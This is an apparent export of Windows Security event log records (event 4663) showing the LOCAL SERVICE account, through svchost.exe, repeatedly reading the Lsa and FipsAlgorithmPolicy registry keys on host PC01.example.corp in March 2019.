S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x468 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.045016+04:00,1553038515.045016,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452819 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x520 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.045016+04:00,1553038515.045016,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452818 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x520 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:14.904814+04:00,1553038514.904814,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452817 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x468 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:14.904814+04:00,1553038514.904814,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + 
+ + 452816 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x468 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:14.764613+04:00,1553038514.764613,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452815 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x520 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:14.764613+04:00,1553038514.764613,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452814 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x520 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:14.634426+04:00,1553038514.634426,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452813 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x468 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +1601-01-01T04:00:00+04:00,-11644473600.0,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + 
+ 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452922 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x420 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.365477+04:00,1553038515.365477,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452921 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x1ac + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.365477+04:00,1553038515.365477,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452920 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x1ac + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.365477+04:00,1553038515.365477,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452919 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x420 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.365477+04:00,1553038515.365477,4663,LOCAL 
SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452918 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x420 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.335434+04:00,1553038515.335434,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452917 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x1ac + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.335434+04:00,1553038515.335434,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452916 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x1ac + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.335434+04:00,1553038515.335434,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452915 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x420 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" 
+2019-03-20T03:35:15.335434+04:00,1553038515.335434,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452914 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x420 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.335434+04:00,1553038515.335434,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452913 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x1ac + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.335434+04:00,1553038515.335434,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452912 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x1ac + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.335434+04:00,1553038515.335434,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452911 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x420 + 
%%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.335434+04:00,1553038515.335434,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452910 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x420 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.335434+04:00,1553038515.335434,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452909 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x1ac + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.335434+04:00,1553038515.335434,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452908 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x1ac + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.335434+04:00,1553038515.335434,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452907 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + 
\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x420 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.335434+04:00,1553038515.335434,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452906 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x420 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.335434+04:00,1553038515.335434,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452905 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x1ac + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.335434+04:00,1553038515.335434,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452904 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x1ac + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.335434+04:00,1553038515.335434,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452903 + + + + + Security + PC01.example.corp + + + + + 
S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x420 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.335434+04:00,1553038515.335434,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452902 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x420 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.335434+04:00,1553038515.335434,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452901 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x1ac + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.335434+04:00,1553038515.335434,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452900 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x1ac + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.335434+04:00,1553038515.335434,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + 
+ + 452899 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x420 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.335434+04:00,1553038515.335434,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452898 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x420 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.335434+04:00,1553038515.335434,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452897 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x1ac + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.335434+04:00,1553038515.335434,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452896 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x1ac + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL 
SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452895 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x420 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452894 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x420 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452893 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x1ac + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452892 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x1ac + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" 
+2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452891 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x420 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452890 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x420 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452889 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x1ac + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452888 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x1ac + 
%%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452887 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x420 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452886 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x468 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452885 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x420 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452884 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + 
